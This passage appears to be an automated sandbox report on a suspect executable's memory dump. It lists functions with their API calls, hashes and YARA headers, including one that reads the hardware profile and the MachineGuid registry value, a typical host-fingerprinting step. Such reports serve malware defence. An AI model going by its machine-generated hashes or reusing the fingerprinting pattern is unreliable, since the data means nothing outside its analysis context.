                                                                                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1828324828-0
                                                                                                                                            • Opcode ID: 37bf4207dbd2c567bc9f51e840e5faf998b6cb734fa08f78f38a4c9e9051fb64
                                                                                                                                            • Instruction ID: b929a6932e3fb0ddf398e67d4bef8812f68a7cc04ac33aee5ea93c15276a3ddd
                                                                                                                                            • Opcode Fuzzy Hash: 37bf4207dbd2c567bc9f51e840e5faf998b6cb734fa08f78f38a4c9e9051fb64
                                                                                                                                            • Instruction Fuzzy Hash: C8E0CD749C0310A9C7317BA3EC0325D7670AF30755F50427FB5445A5C1DA7805418F9F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045D11B, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$DisposeFreeImage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1950503971-0
                                                                                                                                            • Opcode ID: f10c27f198459d0522b782e03ffdbe22d4c19b8626f1160b803baec436346774
                                                                                                                                            • Instruction ID: 21b9809928bbe433024962656e7777cf46af73e364961cb1b7dd6c40f5ef5413
                                                                                                                                            • Opcode Fuzzy Hash: f10c27f198459d0522b782e03ffdbe22d4c19b8626f1160b803baec436346774
                                                                                                                                            • Instruction Fuzzy Hash: 35C01271D0566056C3212E18C40579BEAC48F51345F05881FFD8042212D7BD8D80C3EA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B361, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 0040B364
                                                                                                                                              • Part of subcall function 004639F7: __EH_prolog3.LIBCMT ref: 004639FE
                                                                                                                                              • Part of subcall function 004639F7: std::_Lockit::_Lockit.LIBCPMT ref: 00463A14
                                                                                                                                              • Part of subcall function 004639F7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00463A36
                                                                                                                                              • Part of subcall function 004639F7: std::locale::_Setgloballocale.LIBCPMT ref: 00463A40
                                                                                                                                              • Part of subcall function 004639F7: _Yarn.LIBCPMT ref: 00463A56
                                                                                                                                              • Part of subcall function 004639F7: std::locale::facet::_Incref.LIBCPMT ref: 00463A63
                                                                                                                                            • std::locale::facet::_Incref.LIBCPMT ref: 0040B372
                                                                                                                                              • Part of subcall function 0040B332: std::_Lockit::_Lockit.LIBCPMT ref: 0040B33E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2389631691-0
                                                                                                                                            • Opcode ID: 06ed9f6f8ac66713bca4ee5bdb0f5e6a69adab821d2e912e13617c9e2691359a
                                                                                                                                            • Instruction ID: 1bc07eb70af67530e464c43933ed59819ff08747b71779bca47c00acd5a2b000
                                                                                                                                            • Opcode Fuzzy Hash: 06ed9f6f8ac66713bca4ee5bdb0f5e6a69adab821d2e912e13617c9e2691359a
                                                                                                                                            • Instruction Fuzzy Hash: AEB092A1B043A003CF243FBA281648E51949F4075A31109BF76C1DB342FDBCCE854BC9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00436BEB, Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            • Opcode ID: a11054af237069fca5e19b36be5e78821e14dc165c2e6477da237e21495cd16f
                                                                                                                                            • Instruction ID: c40c0e90dbdf645d203eecf92a0838f5a504a503ee8b9320ca74cbc9735c549a
                                                                                                                                            • Opcode Fuzzy Hash: a11054af237069fca5e19b36be5e78821e14dc165c2e6477da237e21495cd16f
                                                                                                                                            • Instruction Fuzzy Hash: 8491D071A00217FFDB25CF64D841BAEB7B4EF08314F16912BF815A7241D778AC648BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0044C54A, Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a509177250d3c49009035b653161ff4c0b47a65bee790a07f47db6fdbf3e4af
                                                                                                                                            • Instruction ID: 9b12fab8595b626ea3c134c3a29607157a2f34a347a524f270ce5b6bd03a8a22
                                                                                                                                            • Opcode Fuzzy Hash: 7a509177250d3c49009035b653161ff4c0b47a65bee790a07f47db6fdbf3e4af
                                                                                                                                            • Instruction Fuzzy Hash: C8712771A01215AFEB11DF65C8C1AAE7BB4EF44354F19806FF805AB341DB78DE818B89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004036D6, Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            • Opcode ID: d2d2ff15cbb3620395fba4c964925b8be5d907a57c636c48e4c5adb96b70fb12
                                                                                                                                            • Instruction ID: 95ef407fe29868ee133424a42634d92f194cad6d0f06ba15251d0730e90ef7f5
                                                                                                                                            • Opcode Fuzzy Hash: d2d2ff15cbb3620395fba4c964925b8be5d907a57c636c48e4c5adb96b70fb12
                                                                                                                                            • Instruction Fuzzy Hash: CA613BB5200B018FC725CF2DC580A16BBF9BF89715B248A6EE98697B90D775FD01CB14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045E799, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: swprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 233258989-0
                                                                                                                                            • Opcode ID: 1b4dfe4f8e1fdb3c063980fc6f4edf93d970d0c4b5523bed2d95acf2e71fbb9b
                                                                                                                                            • Instruction ID: 209422d12759e9392a341ea8001090789ef07728c77d727a676cfee0c8d0ecb3
                                                                                                                                            • Opcode Fuzzy Hash: 1b4dfe4f8e1fdb3c063980fc6f4edf93d970d0c4b5523bed2d95acf2e71fbb9b
                                                                                                                                            • Instruction Fuzzy Hash: FA510B72D00709EADF1AAFA5D9407DE7BB4FB04355F20451AFC11A22A2E7398D4D8B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040DCA9, Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                            • Opcode ID: 5aee4b312d88e3ac9b236f850c72d7cb766d51cbf57d6a42b9833d13a7b90656
                                                                                                                                            • Instruction ID: 466c9aaec5d8f3bb38500bc21e1a1b644d5ff027ba62c0a467167e7e831fac65
                                                                                                                                            • Opcode Fuzzy Hash: 5aee4b312d88e3ac9b236f850c72d7cb766d51cbf57d6a42b9833d13a7b90656
                                                                                                                                            • Instruction Fuzzy Hash: D0514E30D04605CFDB24CF99C544AAEBBB0AF58324F24426EE452AB3D1C739DE49CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00422752, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00420E26: _memset.LIBCMT ref: 00420E45
                                                                                                                                            • _memset.LIBCMT ref: 00422782
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            • Opcode ID: c56fd628d2d76bfe28c1091636f48a3ee44c7dd0f15e56b14506a34db5f9e74b
                                                                                                                                            • Instruction ID: bbdb0a947960855c7f546ceba61ce1014bac555c34f430c14c931dc39887e51c
                                                                                                                                            • Opcode Fuzzy Hash: c56fd628d2d76bfe28c1091636f48a3ee44c7dd0f15e56b14506a34db5f9e74b
                                                                                                                                            • Instruction Fuzzy Hash: 9B317E70B04714AFD720DF29D84179ABBE4AF08764F00461EF859E7380EB78E9008B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045BCA6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045BCC5
                                                                                                                                              • Part of subcall function 0045BAFD: GetCurrentHwProfileA.ADVAPI32(?), ref: 0045BB21
                                                                                                                                              • Part of subcall function 0045BB5B: _memset.LIBCMT ref: 0045BB9D
                                                                                                                                              • Part of subcall function 0045BB5B: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000,00000000), ref: 0045BBB9
                                                                                                                                              • Part of subcall function 0045BB5B: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000,00000000), ref: 0045BBD8
                                                                                                                                              • Part of subcall function 0045BB5B: RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 0045BBE1
                                                                                                                                              • Part of subcall function 0045BB5B: CharToOemA.USER32 ref: 0045BBF2
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 577691565-0
                                                                                                                                            • Opcode ID: dd3b6076bc92b376ed645475309d28830fbf9a3db708f4352fa6647716b2fbc7
                                                                                                                                            • Instruction ID: 2a5ae8e52abdeacaf8372c1fb63badb65b10079a287905e63f4d55deaa90ae4d
                                                                                                                                            • Opcode Fuzzy Hash: dd3b6076bc92b376ed645475309d28830fbf9a3db708f4352fa6647716b2fbc7
                                                                                                                                            • Instruction Fuzzy Hash: 483141B1900249AFDB15EFA9DD55BEE77F8AF54304F00402FB546A3281DB785B08CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004030ED, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            • Opcode ID: 8ca2c0c5d073d7a22bc9e6e607efc908f0102a0601e69b49f5ff07babcd1382c
                                                                                                                                            • Instruction ID: 48e9b5bc11d4a370afcc985b40dc02906e481fcd640e46d2f0799d9e91b1f892
                                                                                                                                            • Opcode Fuzzy Hash: 8ca2c0c5d073d7a22bc9e6e607efc908f0102a0601e69b49f5ff07babcd1382c
                                                                                                                                            • Instruction Fuzzy Hash: 09317C35900649EFCB10CF19C84469ABBB9FF09366F14827BE814AB291D3789F50CF84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00410769, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                            • Opcode ID: 18bc1be82ce2b4d0c19848f2d6b8d90cdde3ed722d791a4d7eeb0ede62bcaf3f
                                                                                                                                            • Instruction ID: 566f61759ef23ed922a7a52ff59508c67743f05f0ae660b00451f4e51985fafb
                                                                                                                                            • Opcode Fuzzy Hash: 18bc1be82ce2b4d0c19848f2d6b8d90cdde3ed722d791a4d7eeb0ede62bcaf3f
                                                                                                                                            • Instruction Fuzzy Hash: 68115B70A002049FDB14EF59C941A6EB7E5BF44308F10882EE452AB281C7B8E980CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00473656, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00468E58,00000000,?,00000000,00000000,00000000,?,0046D0EF,00000001,00000214), ref: 00473699
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 328603210-0
                                                                                                                                            • Opcode ID: 563676606f8ef49be231dabecb17b0976352ad2946aa227855375ba196f4c1e9
                                                                                                                                            • Instruction ID: 9190c90d7df114f9b8ad46aedb117822300cb3a09877d5e7ea5b5feae8dee511
                                                                                                                                            • Opcode Fuzzy Hash: 563676606f8ef49be231dabecb17b0976352ad2946aa227855375ba196f4c1e9
                                                                                                                                            • Instruction Fuzzy Hash: DC01B531311215ABEF359F25DC04BE73799AF91766F01C52BE8198B3D0EB38AD00DA58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045EE6C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                            • Opcode ID: c7d182394caca94229ab30845e3576c78d27d3cc96a5c7c30d8b0476e5b17615
                                                                                                                                            • Instruction ID: 58b1c0f8b3be4737951401fd3e120054c61fd38ea40752b09ae1fd3b2f2da80a
                                                                                                                                            • Opcode Fuzzy Hash: c7d182394caca94229ab30845e3576c78d27d3cc96a5c7c30d8b0476e5b17615
                                                                                                                                            • Instruction Fuzzy Hash: C1117070A002049FDB24EF99C88195EBBE8FF44308F04885EF445AB342C7B9DE04CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045F191, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                            • Opcode ID: 9b1c0ec93bb6cc213070ca2d3ab3fdbda0b6ba69afbb2a56cc44f8a7bcaf05c4
                                                                                                                                            • Instruction ID: 2c1cae62e2c0ca2732dc8454253fd8eb074a44ddf90da5fde800cae7d59f19fa
                                                                                                                                            • Opcode Fuzzy Hash: 9b1c0ec93bb6cc213070ca2d3ab3fdbda0b6ba69afbb2a56cc44f8a7bcaf05c4
                                                                                                                                            • Instruction Fuzzy Hash: E901C032504300EBEB24EB55D906B897378AB01315F10449FF8496B192DFB9AE8CCB5F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00461FF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00461FFB
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                              • Part of subcall function 00464B51: std::exception::exception.LIBCMT ref: 00464BA0
                                                                                                                                              • Part of subcall function 00464B51: std::exception::exception.LIBCMT ref: 00464BBA
                                                                                                                                              • Part of subcall function 00464B51: __CxxThrowException@8.LIBCMT ref: 00464BCB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2311266369-0
                                                                                                                                            • Opcode ID: f9b738a7fa11d90a5ae5c668b1c807b4b21c5ad0237202357242efcf9233b627
                                                                                                                                            • Instruction ID: 0888c6cc2bbb34c58fac57ac6f5ffa1b2c0673e1e04121853698f4bb4de81b29
                                                                                                                                            • Opcode Fuzzy Hash: f9b738a7fa11d90a5ae5c668b1c807b4b21c5ad0237202357242efcf9233b627
                                                                                                                                            • Instruction Fuzzy Hash: CB01D671601516ABDF296F26890276E7A60AF40714F10811FFA156A2E1EF7CCD01969F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040DAAA, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040DAB1
                                                                                                                                              • Part of subcall function 0040C7EE: std::locale::facet::_Incref.LIBCPMT ref: 0040C801
                                                                                                                                              • Part of subcall function 0040D883: __EH_prolog3.LIBCMT ref: 0040D88A
                                                                                                                                              • Part of subcall function 0040D883: std::_Lockit::_Lockit.LIBCPMT ref: 0040D894
                                                                                                                                              • Part of subcall function 0040D883: int.LIBCPMT ref: 0040D8AB
                                                                                                                                              • Part of subcall function 0040D883: std::locale::_Getfacet.LIBCPMT ref: 0040D8B4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3$GetfacetIncrefLockitLockit::_std::_std::locale::_std::locale::facet::_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 199253227-0
                                                                                                                                            • Opcode ID: ef27aae1a9ba22d2c54063dadf9115f7a01eda1cf93e49aa93230f38be36be1c
                                                                                                                                            • Instruction ID: 7e54997d9c501364dbb480b23128f58fbbd57b1525245d8d2a8ffef41109bc52
                                                                                                                                            • Opcode Fuzzy Hash: ef27aae1a9ba22d2c54063dadf9115f7a01eda1cf93e49aa93230f38be36be1c
                                                                                                                                            • Instruction Fuzzy Hash: A0F09A31A00204ABDF01FFA2CC06B6E76656F04B08F00883EB805E61C2EF7DEA149789
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046129C, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 79342a797c092b9751296ad5cdee1fdf962600198dd8b8ae3fdc20b8dfbe5904
                                                                                                                                            • Instruction ID: ba8613bf395223c9c465d199b38a2e1f2aa55668a29952d78e813b2152cc483d
                                                                                                                                            • Opcode Fuzzy Hash: 79342a797c092b9751296ad5cdee1fdf962600198dd8b8ae3fdc20b8dfbe5904
                                                                                                                                            • Instruction Fuzzy Hash: E6F0D0B4505240ABDB48CF94C6A4A363BA5BB95308F3884DFD105DE212E336D857DB5F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004025E8, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                            • Opcode ID: edc8ca89ee3447941a277e727ca06b368de79d1ba181b8f00f686d0d7eddd216
                                                                                                                                            • Instruction ID: 05f790ccb73c0c1290ca0628b8300294c5984b5ec2d8050a02fe3231c57bda47
                                                                                                                                            • Opcode Fuzzy Hash: edc8ca89ee3447941a277e727ca06b368de79d1ba181b8f00f686d0d7eddd216
                                                                                                                                            • Instruction Fuzzy Hash: C6E02B7200474066D3305E099944B13FBE8AFD1714F140D1FF0842368293BA6C4482BE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046B6F6, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __flsbuf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2056685748-0
                                                                                                                                            • Opcode ID: ff5d4f6b363b2888b0bfb522f9aac5fb506d8155bb3a7f508d68c6d08e034c3c
                                                                                                                                            • Instruction ID: 7b4c620f9b5cfbe91ed4df82c901550d315c331127a77091e695c054ad516510
                                                                                                                                            • Opcode Fuzzy Hash: ff5d4f6b363b2888b0bfb522f9aac5fb506d8155bb3a7f508d68c6d08e034c3c
                                                                                                                                            • Instruction Fuzzy Hash: 78E0923000014099C6240B20C0452317BA0DB8271AF3886CFD581C91E3E33E94C2D6A6
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00402E87, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 00402EBD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileOperation
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                            • Opcode ID: fd9b08b9c581d13d5f8f972459725d72b45b7435633e3ed8f91d3c6f7d70b897
                                                                                                                                            • Instruction ID: e942e318da543a2fb4430839cf318cf19234b6324f5adb3d3c8fe3dea7e9ecda
                                                                                                                                            • Opcode Fuzzy Hash: fd9b08b9c581d13d5f8f972459725d72b45b7435633e3ed8f91d3c6f7d70b897
                                                                                                                                            • Instruction Fuzzy Hash: 5EE052B4D0420D9FCB44DFA8D4456DEBBF8BF08304F00817AE409E7351E77596458BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CC8D, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,?,00000000), ref: 0045CCA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BitmapCreateFromGdip
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4184683939-0
                                                                                                                                            • Opcode ID: 845ab27ab22d36c8c6a2aaf118dd9b77a60885a354f9d8e0cca0fb9955033689
                                                                                                                                            • Instruction ID: 69fd2082b517190b2b19ddc89c91d7c787e5b0403c0ae8168441c3708b1f9812
                                                                                                                                            • Opcode Fuzzy Hash: 845ab27ab22d36c8c6a2aaf118dd9b77a60885a354f9d8e0cca0fb9955033689
                                                                                                                                            • Instruction Fuzzy Hash: C6E0B6B6501219BFDB10DF89C901A9EBBE8EB09355F10845AA985E3210E375AB009BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041AF3C, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                            • Opcode ID: 90e29250f5d24b9a8117dd9ea34cd518e6a7694d9e7104072a6aff58b1bb861e
                                                                                                                                            • Instruction ID: d4095644d87a20b38adae95113a1c5670235dc5841354ab4b5beb1c331993fa8
                                                                                                                                            • Opcode Fuzzy Hash: 90e29250f5d24b9a8117dd9ea34cd518e6a7694d9e7104072a6aff58b1bb861e
                                                                                                                                            • Instruction Fuzzy Hash: 93D0A73760E6203AD5111540BC01A8B7B418F40770F14801AF50815150D6365C6143DF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045D0A6, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FolderPath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                            • Opcode ID: 101e96db6a8eb4d7abf8ad7dd557775e40bcaa5a388946e7f8928a64f16f6f89
                                                                                                                                            • Instruction ID: c9f6fa2b8fde3107c40537376e6c44c5ce895217b3463b5fa2b75ac4976ea73b
                                                                                                                                            • Opcode Fuzzy Hash: 101e96db6a8eb4d7abf8ad7dd557775e40bcaa5a388946e7f8928a64f16f6f89
                                                                                                                                            • Instruction Fuzzy Hash: 14D0C975208202BEA2545B64DC06E7BBBADEBC8210F01882DB989C10A0DA30E8948A32
                                                                                                                                            Uniqueness

